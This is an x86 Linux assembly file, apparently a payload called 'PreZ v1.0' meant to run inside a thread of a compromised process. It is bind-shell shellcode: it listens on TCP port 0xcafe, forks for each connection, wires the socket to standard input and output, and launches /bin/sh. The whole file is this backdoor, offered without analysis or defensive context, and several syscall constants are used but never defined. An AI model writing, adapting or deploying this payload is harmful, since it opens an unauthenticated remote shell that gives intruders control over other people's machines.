# PreZ v1.0 - Linux Version
# This is the code that will be executed in the new thread

.equ    SYS_socketcall, 102

.equ    SYS_SOCKET, 1
.equ    SYS_BIND, 2
.equ    SYS_LISTEN, 4
.equ    SYS_ACCEPT, 5

.equ    AF_INET, 2
.equ    SOCK_STREAM, 1

# Save some space for various variables
    subl    $0x20, %esp

# Create socket
    movl    $0, -0x4(%ebp)
    movl    $SOCK_STREAM, -0x8(%ebp)
    movl    $AF_INET, -0xc(%ebp)
    movl    $SYS_socketcall, %eax
    movl    $SYS_SOCKET, %ebx
    leal    -0xc(%ebp), %ecx
    int     $0x80
    movl    %eax, %edi

# Bind
    movw    $AF_INET, -0x1e(%ebp)
    movw    $0xcafe, -0x1c(%ebp)
    movl    $0, -0x18(%ebp)
    movl    $0, -0x14(%ebp)
    movl    $0, -0x10(%ebp)
    leal    -0x1e(%ebp), %eax
    movl    $16, -0x4(%ebp)
    movl    %eax, -0x8(%ebp)
    movl    %edi, -0xc(%ebp)
    movl    $SYS_socketcall, %eax
    movl    $SYS_BIND, %ebx
    leal    -0xc(%ebp), %ecx
    int     $0x80

# Listen
    movl    $0xff, -0x8(%ebp)
    movl    $SYS_socketcall, %eax
    movl    $SYS_LISTEN, %ebx
    int     $0x80

# Accept connection
accept_conn:
    movl    $0, -0x4(%ebp)
    movl    $0, -0x8(%ebp)
    movl    %edi, -0xc(%ebp)
    movl    $SYS_socketcall, %eax
    movl    $SYS_ACCEPT, %ebx
    leal    -0xc(%ebp), %ecx
    int     $0x80
    movl    %eax, %esi

# Fork child
    movl    $SYS_fork, %eax
    int     $0x80
    test    %eax, %eax
    jnz     accept_conn

# Close and dup
    movl    $SYS_close, %eax
    xorl    %ebx, %ebx
    int     $0x80
    movl    $SYS_close, %eax
    inc     %ebx
    int     $0x80
    movl    $SYS_close, %eax
    inc     %ebx
    int     $0x80

    movl    $SYS_dup2, %eax
    movl    %esi, %ebx
    xorl    %ecx, %ecx
    int     $0x80
    movl    $SYS_dup2, %eax
    inc     %ecx
    int     $0x80
    movl    $SYS_dup2, %eax
    inc     %ecx
    int     $0x80

# Exec shell
    pushl   $0x0068732f
    pushl   $0x6e69622f
    movl    %esp, %ebx
    xorl    %ecx, %ecx
    movl    $SYS_execve, %eax
    int     $0x80

# Exit
    movl    $SYS_exit, %eax
    int     $0x80
